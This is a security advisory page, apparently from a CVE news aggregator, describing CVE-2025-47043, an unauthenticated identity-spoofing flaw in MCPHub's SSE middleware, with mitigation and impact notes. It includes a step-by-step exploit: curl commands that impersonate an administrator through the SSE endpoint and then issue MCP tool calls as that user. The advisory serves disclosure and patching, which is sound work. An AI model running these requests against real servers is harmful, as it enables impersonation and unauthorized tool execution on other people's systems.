MCPHub, Identity Spoofing, CVE-2025-47043 (Critical)

Listen to this Post

The vulnerability stems from the `sseUserContextMiddleware` function in `src/middlewares/userContext.ts` (lines 42-75), which extracts the username directly from the URL path parameter `req.params.user` without any authentication, validation, or database lookup. The middleware then constructs a fabricated `IUser` object using this attacker-controlled username and passes it to UserContextService.setCurrentUser(), which accepts the forged identity as legitimate. The server uses this identity to create a full MCP session and proxy subsequent tool calls. The source code itself contains a `TODO` comment acknowledging the missing validation.
The SSE route in `src/server.ts` (lines 132-161) applies only rate limiting and this vulnerable middleware, with no authentication checks in the chain. Additionally, `UserContextService` is a singleton that stores the current user in a single instance variable, allowing concurrent connections to silently overwrite each other’s context and creating a secondary race condition (CWE-362). An unauthenticated attacker can exploit this by connecting to the `/[:user]/sse` endpoint, impersonating any user—including administrators—and executing MCP tool calls under that fabricated identity. All MCPHub instances exposing SSE endpoints without bearer authentication are affected, including the default configuration.

DailyCVE Form:

Platform: Node.js npm
Version: ≤0.12.14
Vulnerability : Identity Spoofing
Severity: CRITICAL
date: 2026-05-14

Prediction: 2026-05-15

What Undercode Say:

Check for vulnerable versions
npm list @samanhappy/mcphub
Simulate exploitation (ethical use only)
curl -s -N --max-time 3 http://TARGET:3100/admin/sse

Exploit:

Step 1: Impersonate any user via SSE
curl -s -N --max-time 3 http://TARGET:3100/CEO-admin-impersonated/sse
Expected response contains sessionId
Step 2: Execute MCP tool call as the impersonated user
curl -X POST http://TARGET:3100/CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758 \
-H 'Content-Type: application/json' \
-d '{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"any-tool","arguments":{}}}'

Protection from this CVE:

  • Upgrade to MCPHub version 0.12.15 or later.
  • Enable bearer authentication (enableBearerAuth: true) and configure strong bearer tokens.
  • If upgrading is not immediately possible, block external access to SSE endpoints at the network perimeter.

Impact:

  • Complete Account Impersonation: Attackers can impersonate any user, including administrators, without any credentials.
  • Unauthorized Tool Execution: Full MCP tool access under the spoofed identity, leading to data breaches and lateral movement.
  • Audit Log Poisoning: All malicious actions are logged under the impersonated user’s name, destroying forensic evidence.
  • By design: The default configuration is vulnerable; no authentication is required.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top